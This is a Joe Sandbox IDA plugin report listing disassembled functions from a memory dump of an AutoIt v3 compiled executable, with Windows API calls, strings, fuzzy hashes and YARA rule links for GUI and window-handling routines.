SetTextColor.GDI32(?,?), ref: 00A9AA9A
SetBkColor.GDI32(?,?), ref: 00A9AAA4

Memory Dump Source

Source File: 00000000.00000002.1332986548.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.1332968165.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333034122.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333034122.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333080838.0000000000ACE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AD7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AD9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AED000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_XeFYBYYj0w.jbxd

Similarity

API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
String ID:
API String ID: 1996641542-0
Opcode ID: 1989c34b33044cf17b73a4e7d5eb204a76dc6c81fda48ac67ce441c9fbd12102
Instruction ID: d86ec852f96c79f308e786d0a5859dec68d22f297b6c9f6bc5f77d753cced2eb
Opcode Fuzzy Hash: 1989c34b33044cf17b73a4e7d5eb204a76dc6c81fda48ac67ce441c9fbd12102
Instruction Fuzzy Hash: 3C511171A00218EFDF11DFA4DC48E9E7BB9FB48320F214626F911EB2A1DB759941DB90

Function 00A989D5 Relevance: 38.9, APIs: 21, Strings: 1, Instructions: 401windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00000158,000000FF,0000014E), ref: 00A98AC1
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00A98AD2
CharNextW.USER32(0000014E), ref: 00A98B01
SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 00A98B42
SendMessageW.USER32(?,00000158,000000FF,00000158), ref: 00A98B58
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00A98B69
SendMessageW.USER32(?,000000C2,00000001,0000014E), ref: 00A98B86
SetWindowTextW.USER32(?,0000014E), ref: 00A98BD8
SendMessageW.USER32(?,000000B1,000F4240,000F423F), ref: 00A98BEE
SendMessageW.USER32(?,00001002,00000000,?), ref: 00A98C1F
_memset.LIBCMT ref: 00A98C44
SendMessageW.USER32(00000000,00001060,00000001,00000004), ref: 00A98C8D
_memset.LIBCMT ref: 00A98CEC
SendMessageW.USER32(?,00001053,000000FF,?), ref: 00A98D16
SendMessageW.USER32(?,00001074,?,00000001), ref: 00A98D6E
SendMessageW.USER32(?,0000133D,?,?), ref: 00A98E1B
InvalidateRect.USER32(?,00000000,00000001), ref: 00A98E3D
GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00A98E87
SetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00A98EB4
DrawMenuBar.USER32(?), ref: 00A98EC3
SetWindowTextW.USER32(?,0000014E), ref: 00A98EEB

Strings

0, xrefs: 00A98E55

Memory Dump Source

Source File: 00000000.00000002.1332986548.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.1332968165.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333034122.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333034122.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333080838.0000000000ACE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AD7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AD9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AED000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_XeFYBYYj0w.jbxd

Similarity

API ID: MessageSend$Menu$InfoItemTextWindow_memset$CharDrawInvalidateNextRect
String ID: 0
API String ID: 1073566785-4108050209
Opcode ID: 2394ff5c8911e7471594d865b9ca59c60f559ced225997bc0c0b6e7211fa35ec
Instruction ID: 372d82fd13a66692eae97231129aff6ecf15c98e38afdf15d0e62b5e8c4a76d2
Opcode Fuzzy Hash: 2394ff5c8911e7471594d865b9ca59c60f559ced225997bc0c0b6e7211fa35ec
Instruction Fuzzy Hash: 05E16F75A01218AFDF20DFA4CC84EEE7BB9EF06750F108156F915AA290DF789981DF60

Function 00A9488F Relevance: 37.0, APIs: 18, Strings: 3, Instructions: 290windowCOMMON

Download Yara Rule

APIs

GetCursorPos.USER32(?), ref: 00A949CA
GetDesktopWindow.USER32 ref: 00A949DF
GetWindowRect.USER32(00000000), ref: 00A949E6
GetWindowLongW.USER32(?,000000F0), ref: 00A94A48
DestroyWindow.USER32(?), ref: 00A94A74
CreateWindowExW.USER32(00000008,tooltips_class32,00000000,00000003,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 00A94A9D
SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00A94ABB
SendMessageW.USER32(?,00000439,00000000,00000030), ref: 00A94AE1
SendMessageW.USER32(?,00000421,?,?), ref: 00A94AF6
SendMessageW.USER32(?,0000041D,00000000,00000000), ref: 00A94B09
IsWindowVisible.USER32(?), ref: 00A94B29
SendMessageW.USER32(?,00000412,00000000,D8F0D8F0), ref: 00A94B44
SendMessageW.USER32(?,00000411,00000001,00000030), ref: 00A94B58
GetWindowRect.USER32(?,?), ref: 00A94B70
MonitorFromPoint.USER32(?,?,00000002), ref: 00A94B96
GetMonitorInfoW.USER32(00000000,?), ref: 00A94BB0
CopyRect.USER32(?,?), ref: 00A94BC7
SendMessageW.USER32(?,00000412,00000000), ref: 00A94C32

Strings

0, xrefs: 00A94975
(, xrefs: 00A94BA3
tooltips_class32, xrefs: 00A94A96

Memory Dump Source

Source File: 00000000.00000002.1332986548.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.1332968165.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333034122.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333034122.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333080838.0000000000ACE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AD7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AD9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AED000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_XeFYBYYj0w.jbxd

Similarity

API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
String ID: ($0$tooltips_class32
API String ID: 698492251-4156429822
Opcode ID: 8feedf3adb31c33369b2b336471fa7b4e0eed8de4a6263e13299fa4634993ada
Instruction ID: 72e0c4b3cc21f71e4ba52c2c55a292174d9dbb765c1ce48b6a14335dc60a4818
Opcode Fuzzy Hash: 8feedf3adb31c33369b2b336471fa7b4e0eed8de4a6263e13299fa4634993ada
Instruction Fuzzy Hash: 03B16971608340AFDB04DF65C984B6BBBE4BF88310F00891DF5999B2A1DB71E846CB95

Function 00A7449A Relevance: 36.9, APIs: 16, Strings: 5, Instructions: 179COMMON

Download Yara Rule

APIs

GetFileVersionInfoSizeW.VERSION(?,?), ref: 00A744AC
GetFileVersionInfoW.VERSION(?,00000000,00000000,00000000,?,?), ref: 00A744D2
_wcscpy.LIBCMT ref: 00A74500
_wcscmp.LIBCMT ref: 00A7450B
_wcscat.LIBCMT ref: 00A74521
_wcsstr.LIBCMT ref: 00A7452C
VerQueryValueW.VERSION(?,\VarFileInfo\Translation,?,?,?,?,?,?,00000000,?,?), ref: 00A74548
_wcscat.LIBCMT ref: 00A74591
_wcscat.LIBCMT ref: 00A74598
_wcsncpy.LIBCMT ref: 00A745C3

Strings

04090000, xrefs: 00A7457E
DefaultLangCodepage, xrefs: 00A745AB
%u.%u.%u.%u, xrefs: 00A74626
\VarFileInfo\Translation, xrefs: 00A74540
StringFileInfo\, xrefs: 00A7451B

Memory Dump Source

Source File: 00000000.00000002.1332986548.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.1332968165.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333034122.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333034122.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333080838.0000000000ACE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AD7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AD9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AED000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_XeFYBYYj0w.jbxd

Similarity

API ID: _wcscat$FileInfoVersion$QuerySizeValue_wcscmp_wcscpy_wcsncpy_wcsstr
String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
API String ID: 699586101-1459072770
Opcode ID: 86714748943ce4f9dac2c616c0d76c5a7a91dc5ded4a010ca237d89c903982e4
Instruction ID: 0cf269a67644434f57f3c0b1a24a9831573aaa1553ca7efd81d83537d2608502
Opcode Fuzzy Hash: 86714748943ce4f9dac2c616c0d76c5a7a91dc5ded4a010ca237d89c903982e4
Instruction Fuzzy Hash: 7E41D632A002107FEB10EB749D47FBF77ACEF45750F14846AF909E6182EB359A0197A9

Function 00A127D9 Relevance: 33.5, APIs: 18, Strings: 1, Instructions: 286windowtimeCOMMON

Download Yara Rule

APIs

SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00A128BC
GetSystemMetrics.USER32(00000007), ref: 00A128C4
SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00A128EF
GetSystemMetrics.USER32(00000008), ref: 00A128F7
GetSystemMetrics.USER32(00000004), ref: 00A1291C
SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 00A12939
AdjustWindowRectEx.USER32(000000FF,?,00000000,?), ref: 00A12949
CreateWindowExW.USER32(?,AutoIt v3 GUI,?,?,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 00A1297C
SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 00A12990
GetClientRect.USER32(00000000,000000FF), ref: 00A129AE
GetStockObject.GDI32(00000011), ref: 00A129CA
SendMessageW.USER32(00000000,00000030,00000000), ref: 00A129D5

Part of subcall function 00A12344: GetCursorPos.USER32(?), ref: 00A12357
Part of subcall function 00A12344: ScreenToClient.USER32(00AD57B0,?), ref: 00A12374
Part of subcall function 00A12344: GetAsyncKeyState.USER32(00000001), ref: 00A12399
Part of subcall function 00A12344: GetAsyncKeyState.USER32(00000002), ref: 00A123A7

SetTimer.USER32(00000000,00000000,00000028,00A11256), ref: 00A129FC

Strings

AutoIt v3 GUI, xrefs: 00A12974

Memory Dump Source

Source File: 00000000.00000002.1332986548.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.1332968165.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333034122.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333034122.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333080838.0000000000ACE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AD7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AD9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AED000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_XeFYBYYj0w.jbxd

Similarity

API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
String ID: AutoIt v3 GUI
API String ID: 1458621304-248962490
Opcode ID: c293afc1d0d24f900946815272ff5c32a99c72c4314c6900ee92c55aca3d04cd
Instruction ID: b272aad1032121dbb15e2524e6ec1f0c0c7e9e62fff18f565526912bd3853239
Opcode Fuzzy Hash: c293afc1d0d24f900946815272ff5c32a99c72c4314c6900ee92c55aca3d04cd
Instruction Fuzzy Hash: 70B15B75A0120AEFDB14DFA8DC45BEE7BB4FB48311F10422AFA16E6290DB74D851CB50

Function 00A6A439 Relevance: 26.5, APIs: 14, Strings: 1, Instructions: 273windowtimeCOMMON

Download Yara Rule

APIs

GetClassNameW.USER32(?,?,00000100), ref: 00A6A47A
__swprintf.LIBCMT ref: 00A6A51B
_wcscmp.LIBCMT ref: 00A6A52E
SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 00A6A583
_wcscmp.LIBCMT ref: 00A6A5BF
GetClassNameW.USER32(?,?,00000400), ref: 00A6A5F6
GetDlgCtrlID.USER32(?), ref: 00A6A648
GetWindowRect.USER32(?,?), ref: 00A6A67E
GetParent.USER32(?), ref: 00A6A69C
ScreenToClient.USER32(00000000), ref: 00A6A6A3
GetClassNameW.USER32(?,?,00000100), ref: 00A6A71D
_wcscmp.LIBCMT ref: 00A6A731
GetWindowTextW.USER32(?,?,00000400), ref: 00A6A757
_wcscmp.LIBCMT ref: 00A6A76B

Part of subcall function 00A3362C: _iswctype.LIBCMT ref: 00A33634

Strings

%s%u, xrefs: 00A6A515

Memory Dump Source

Source File: 00000000.00000002.1332986548.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.1332968165.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333034122.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333034122.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333080838.0000000000ACE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AD7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AD9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AED000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_XeFYBYYj0w.jbxd

Similarity

API ID: _wcscmp$ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout__swprintf_iswctype
String ID: %s%u
API String ID: 3744389584-679674701
Opcode ID: ac8c008b5b0101ee5ff3dd3cbb5ef5a4ff60133cae81a4dfcd2bebf36fc15ada
Instruction ID: 783eec5c5b9b47414eefa268944d5e8df9a3ade6b0ea201a5a95e717454f21bc
Opcode Fuzzy Hash: ac8c008b5b0101ee5ff3dd3cbb5ef5a4ff60133cae81a4dfcd2bebf36fc15ada
Instruction Fuzzy Hash: 48A1D171204306AFDB14DF64C884BAAB7F8FF54355F108529F99AE2190DB30E956CF92

Function 00A6AED4 Relevance: 26.5, APIs: 13, Strings: 2, Instructions: 249COMMON

Download Yara Rule

APIs

GetClassNameW.USER32(00000008,?,00000400), ref: 00A6AF18
_wcscmp.LIBCMT ref: 00A6AF29
GetWindowTextW.USER32(00000001,?,00000400), ref: 00A6AF51
CharUpperBuffW.USER32(?,00000000), ref: 00A6AF6E
_wcscmp.LIBCMT ref: 00A6AF8C
_wcsstr.LIBCMT ref: 00A6AF9D
GetClassNameW.USER32(00000018,?,00000400), ref: 00A6AFD5
_wcscmp.LIBCMT ref: 00A6AFE5
GetWindowTextW.USER32(00000002,?,00000400), ref: 00A6B00C
GetClassNameW.USER32(00000018,?,00000400), ref: 00A6B055
_wcscmp.LIBCMT ref: 00A6B065
GetClassNameW.USER32(00000010,?,00000400), ref: 00A6B08D
GetWindowRect.USER32(00000004,?), ref: 00A6B0F6

Strings

@, xrefs: 00A6AEF9
ThumbnailClass, xrefs: 00A6AFE0, 00A6B060

Memory Dump Source

Source File: 00000000.00000002.1332986548.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.1332968165.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333034122.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333034122.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333080838.0000000000ACE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AD7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AD9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AED000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_XeFYBYYj0w.jbxd

Similarity

API ID: ClassName_wcscmp$Window$Text$BuffCharRectUpper_wcsstr
String ID: @$ThumbnailClass
API String ID: 1788623398-1539354611
Opcode ID: ff0903f72e3785f881838a01498991ae63f02439f010239eec7f62826399d128
Instruction ID: fdb058d5a525f141317cd6d1ed46e9d0c0860e5f4d17acaa2fc4be25a5caf34d
Opcode Fuzzy Hash: ff0903f72e3785f881838a01498991ae63f02439f010239eec7f62826399d128
Instruction Fuzzy Hash: B6819D72118205AFDB05DF14C981BAA7BF8EF54314F04856AFD85DA092DB34DD8ACBA2

Function 00A6ABD4 Relevance: 26.4, APIs: 3, Strings: 12, Instructions: 105COMMON

Download Yara Rule

APIs

__wcsnicmp.LIBCMT ref: 00A6AC33

Strings

ALL, xrefs: 00A6ACC7
[ALL, xrefs: 00A6ACD9
[HANDLE:, xrefs: 00A6AC3F
REGEXP=, xrefs: 00A6AC48
LAST, xrefs: 00A6ABF8
[CLASS:, xrefs: 00A6AC83
[REGEXPTITLE:, xrefs: 00A6AC5B
[LAST, xrefs: 00A6ACE0
ACTIVE, xrefs: 00A6AC0E
HANDLE=, xrefs: 00A6AC2C
CLASSNAME=, xrefs: 00A6AC70
[ACTIVE, xrefs: 00A6AC20

Memory Dump Source

Source File: 00000000.00000002.1332986548.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.1332968165.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333034122.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333034122.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333080838.0000000000ACE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AD7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AD9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AED000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_XeFYBYYj0w.jbxd

Similarity

API ID: __wcsnicmp
String ID: ACTIVE$ALL$CLASSNAME=$HANDLE=$LAST$REGEXP=$[ACTIVE$[ALL$[CLASS:$[HANDLE:$[LAST$[REGEXPTITLE:
API String ID: 1038674560-1810252412
Opcode ID: 59fe843e2de69790dd5a8f08f25b4bf04bed237de28f13ea862b880a1ee8755f
Instruction ID: a7b3517266be784fcee3861e5ad5e5c72d90640021cebc76ec8a6312f1915831
Opcode Fuzzy Hash: 59fe843e2de69790dd5a8f08f25b4bf04bed237de28f13ea862b880a1ee8755f
Instruction Fuzzy Hash: 51313C71A48209BADB14EBA1DF43FEE77B4BB20790F600929F456710D1EF616F448E52

Function 00A84FFD Relevance: 25.6, APIs: 17, Instructions: 110COMMON

Download Yara Rule

APIs

LoadCursorW.USER32(00000000,00007F8A), ref: 00A85013
LoadCursorW.USER32(00000000,00007F00), ref: 00A8501E
LoadCursorW.USER32(00000000,00007F03), ref: 00A85029
LoadCursorW.USER32(00000000,00007F8B), ref: 00A85034
LoadCursorW.USER32(00000000,00007F01), ref: 00A8503F
LoadCursorW.USER32(00000000,00007F81), ref: 00A8504A
LoadCursorW.USER32(00000000,00007F88), ref: 00A85055
LoadCursorW.USER32(00000000,00007F80), ref: 00A85060
LoadCursorW.USER32(00000000,00007F86), ref: 00A8506B
LoadCursorW.USER32(00000000,00007F83), ref: 00A85076
LoadCursorW.USER32(00000000,00007F85), ref: 00A85081
LoadCursorW.USER32(00000000,00007F82), ref: 00A8508C
LoadCursorW.USER32(00000000,00007F84), ref: 00A85097
LoadCursorW.USER32(00000000,00007F04), ref: 00A850A2
LoadCursorW.USER32(00000000,00007F02), ref: 00A850AD
LoadCursorW.USER32(00000000,00007F89), ref: 00A850B8
GetCursorInfo.USER32(?), ref: 00A850C8

Memory Dump Source

Source File: 00000000.00000002.1332986548.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.1332968165.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333034122.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333034122.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333080838.0000000000ACE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AD7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AD9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AED000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_XeFYBYYj0w.jbxd

Similarity

API ID: Cursor$Load$Info
String ID:
API String ID: 2577412497-0
Opcode ID: 00d1a8a35a382f6c257bdc6fa782deeb56d630adfbddacbf24168597ecadcadf
Instruction ID: fbf90e3bd0cfd9787ba1890038790f9d22022aeed4bb854bdf03859d2af20b94
Opcode Fuzzy Hash: 00d1a8a35a382f6c257bdc6fa782deeb56d630adfbddacbf24168597ecadcadf
Instruction Fuzzy Hash: 4F31E3B1D483196ADB10AFB68C8999FBFF8FB04750F50452AA54DE7280DA7865018F91

Function 00A9A1B9 Relevance: 24.7, APIs: 12, Strings: 2, Instructions: 205windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00A9A259
DestroyWindow.USER32(?,?), ref: 00A9A2D3

Part of subcall function 00A17BCC: _memmove.LIBCMT ref: 00A17C06

CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 00A9A34D
SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 00A9A36F
SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00A9A382
DestroyWindow.USER32(00000000), ref: 00A9A3A4
CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00A10000,00000000), ref: 00A9A3DB
SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00A9A3F4
GetDesktopWindow.USER32 ref: 00A9A40D
GetWindowRect.USER32(00000000), ref: 00A9A414
SendMessageW.USER32(00000000,00000418,00000000,?), ref: 00A9A42C
SendMessageW.USER32(00000000,00000421,?,00000000), ref: 00A9A444

Part of subcall function 00A125DB: GetWindowLongW.USER32(?,000000EB), ref: 00A125EC

Strings

0, xrefs: 00A9A26F
tooltips_class32, xrefs: 00A9A346, 00A9A3D4

Memory Dump Source

Source File: 00000000.00000002.1332986548.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.1332968165.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333034122.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333034122.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333080838.0000000000ACE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AD7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AD9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AED000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_XeFYBYYj0w.jbxd

Similarity

API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_memmove_memset
String ID: 0$tooltips_class32
API String ID: 1297703922-3619404913
Opcode ID: c6293aed63e6a4d88ea740e23152583d3b99dae34d3582e3e5db6016023aa24f
Instruction ID: 3e5020f7b20b483f33b226857c5670e898848929ec521b513cbf646afca974ef
Opcode Fuzzy Hash: c6293aed63e6a4d88ea740e23152583d3b99dae34d3582e3e5db6016023aa24f
Instruction Fuzzy Hash: 2971AE71640344AFDB21CF68CC49FAA77E5FB98300F04451EF9868B2A0DB70E942DB92

Function 00A9C5FE Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 181windowfileCOMMON

Download Yara Rule

APIs

Part of subcall function 00A12612: GetWindowLongW.USER32(?,000000EB), ref: 00A12623

DragQueryPoint.SHELL32(?,?), ref: 00A9C627

Part of subcall function 00A9AB37: ClientToScreen.USER32(?,?), ref: 00A9AB60
Part of subcall function 00A9AB37: GetWindowRect.USER32(?,?), ref: 00A9ABD6
Part of subcall function 00A9AB37: PtInRect.USER32(?,?,00A9C014), ref: 00A9ABE6

SendMessageW.USER32(?,000000B0,?,?), ref: 00A9C690
DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 00A9C69B
DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 00A9C6BE
_wcscat.LIBCMT ref: 00A9C6EE
SendMessageW.USER32(?,000000C2,00000001,?), ref: 00A9C705
SendMessageW.USER32(?,000000B0,?,?), ref: 00A9C71E
SendMessageW.USER32(?,000000B1,?,?), ref: 00A9C735
SendMessageW.USER32(?,000000B1,?,?), ref: 00A9C757
DragFinish.SHELL32(?), ref: 00A9C75E
DefDlgProcW.USER32(?,00000233,?,00000000,?,?,?), ref: 00A9C851

Strings

@GUI_DRAGID, xrefs: 00A9C7C9
@GUI_DROPID, xrefs: 00A9C77E
@GUI_DRAGFILE, xrefs: 00A9C800

Memory Dump Source

Source File: 00000000.00000002.1332986548.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.1332968165.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333034122.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333034122.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333080838.0000000000ACE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AD7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AD9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AED000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_XeFYBYYj0w.jbxd

Similarity

API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreen_wcscat
String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID
API String ID: 169749273-3440237614
Opcode ID: 7b09bbb38495c06674bd8410106b7a0dd95988d3f6627e63e4b91d658883c00b
Instruction ID: 902ae1e83ec8d03131448b5055f656e8a8e8f2c3a228e52a7bd0bc442fb593ea
Opcode Fuzzy Hash: 7b09bbb38495c06674bd8410106b7a0dd95988d3f6627e63e4b91d658883c00b
Instruction Fuzzy Hash: A4615B71608300AFCB01EFA4DD85DAFBBE8FF89750F10092EF695961A1DB709949CB52

Function 00A94392 Relevance: 23.0, APIs: 2, Strings: 11, Instructions: 251windowCOMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?), ref: 00A94424
SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00A9446F

Strings

CHECK, xrefs: 00A9448F
COLLAPSE, xrefs: 00A944B5
GETTOTALCOUNT, xrefs: 00A94456
EXPAND, xrefs: 00A94521
GETTEXT, xrefs: 00A945C2
EXISTS, xrefs: 00A944D8
ISCHECKED, xrefs: 00A945F2
UNCHECK, xrefs: 00A9464B
